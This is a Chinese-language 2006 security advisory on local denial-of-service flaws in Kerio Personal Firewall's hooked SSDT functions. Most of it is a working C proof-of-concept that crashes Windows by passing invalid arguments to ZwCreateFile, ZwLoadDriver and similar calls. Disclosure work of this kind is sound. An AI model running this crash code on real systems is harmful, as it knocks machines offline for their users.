安全研究
安全漏洞
Sunbelt Kerio个人防火墙多个本地拒绝服务漏洞
发布日期:2006-10-04
更新日期:2006-10-09
受影响系统:
Sunbelt Software Kerio Personal Firewall 4.3.268描述:
Sunbelt Software Kerio Personal Firewall 4.3.246
Sunbelt Software Kerio Personal Firewall 4.2.3.912
BUGTRAQ ID: 20299
Sunbelt Kerio个人防火墙是一个简单的基于规则设置的防火墙安全防护软件。
Sunbelt Kerio在处理挂接系统调用时存在漏洞,本地攻击者可能利用此漏洞导致系统崩溃。
Sunbelt Kerio个人防火墙hook了SSDT中的很多函数,其中至少有6种情况可能没有验证用户模式的参数。由于fwdrv.sys和khips.sys驱动中的错误,如果使用无效参数值调用了NtCreateFile、NtDeleteFile、NtLoadDriver、NtMapViewOfSection、NtOpenFile或NtSetInformationFile的话,就会导致系统崩溃。
<*来源:David Matousek (david@matousec.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=115980949618176&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Testing program for Multiple insufficient argument validation of hooked SSDT function Vulnerability (BTP00000P001SK)
Usage:
prog FUNCNAME
FUNCNAME - name of function to be checked
Description:
This program calls given function with parameters that cause the crash of the system. This happens because of
insufficient check of function arguments in the driver of the firewall.
Test:
Running the testing program with the name of function from the list of functions with insufficient check
of arguments.
*/
#undef __STRICT_ANSI__
#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <ddk/ntapi.h>
#include <ddk/ntifs.h>
void about(void)
{
printf("Testing program for Multiple insufficient argument validation of hooked SSDT function Vulnerability (BTP00000P001SK)\n");
printf("Windows Personal Firewall analysis project\n");
printf("Copyright 2006 by Matousec - Transparent security\n");
printf("http://www.matousec.com/\n\n");
return;
}
void usage(void)
{
printf("Usage: test FUNCNAME\n"
" FUNCNAME - name of function to be checked\n");
return;
}
void print_last_error()
{
LPTSTR buf;
DWORD code=GetLastError();
if (FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,NULL,code,0,(LPTSTR)&buf,0,NULL))
{
fprintf(stderr,"Error code: %d\n",code);
fprintf(stderr,"Error message: %s",buf);
LocalFree(buf);
} else fprintf(stderr,"Unable to format error message for code %d.\n",code);
return;
}
int main(int argc,char **argv)
{
about();
if (argc!=2)
{
usage();
return 1;
}
if (!stricmp(argv[1],"NtCreateFile") || !stricmp(argv[1],"ZwCreateFile"))
{
HANDLE handle;
OBJECT_ATTRIBUTES oa;
InitializeObjectAttributes(&oa,NULL,0,NULL,NULL);
for (oa.ObjectName=(PVOID)0x80000000;;oa.ObjectName+=0x0300)
ZwCreateFile(&handle,0,&oa,NULL,NULL,0,0,0,0,NULL,0);
} else if (!stricmp(argv[1],"NtDeleteFile") || !stricmp(argv[1],"ZwDeleteFile"))
{
OBJECT_ATTRIBUTES oa;
UNICODE_STRING us={0x1000,0x1000,(PVOID)-1};
InitializeObjectAttributes(&oa,&us,0,NULL,NULL);
for (oa.ObjectName=(PVOID)0x80000000;;oa.ObjectName+=0x0300)
ZwDeleteFile(&oa);
} else if (!stricmp(argv[1],"NtLoadDriver") || !stricmp(argv[1],"ZwLoadDriver"))
{
for (PUNICODE_STRING us=(PVOID)0xFFFF0000;;us-=0x0231)
ZwLoadDriver(us);
} else if (!stricmp(argv[1],"NtMapViewOfSection") || !stricmp(argv[1],"ZwMapViewOfSection"))
{
ZwMapViewOfSection(NULL,NULL,NULL,0,0,NULL,NULL,1,0,0);
} else if (!stricmp(argv[1],"NtOpenFile") || !stricmp(argv[1],"ZwOpenFile"))
{
HANDLE handle;
OBJECT_ATTRIBUTES oa;
UNICODE_STRING us={0x1000,0x1000,(PVOID)-1};
InitializeObjectAttributes(&oa,&us,0,NULL,NULL);
for (oa.ObjectName=(PVOID)0xFFFFFF00;;oa.ObjectName-=0x4321)
ZwOpenFile(&handle,0,&oa,NULL,0,0);
} else if (!stricmp(argv[1],"NtSetInformationFile") || !stricmp(argv[1],"ZwSetInformationFile"))
{
for (ULONG code=0xFFFFFF00;;code-=0x4321)
ZwSetInformationFile(NULL,NULL,(PVOID)code,code,13);
} else printf("\nI do not know how to exploit the vulnerability using this function.\n");
printf("\nTEST FAILED!\n");
return 1;
}
建议:
厂商补丁:
Sunbelt Software
----------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.sunbelt-software.com/
浏览次数:3897
严重程度:0(网友投票)
绿盟科技给您安全的保障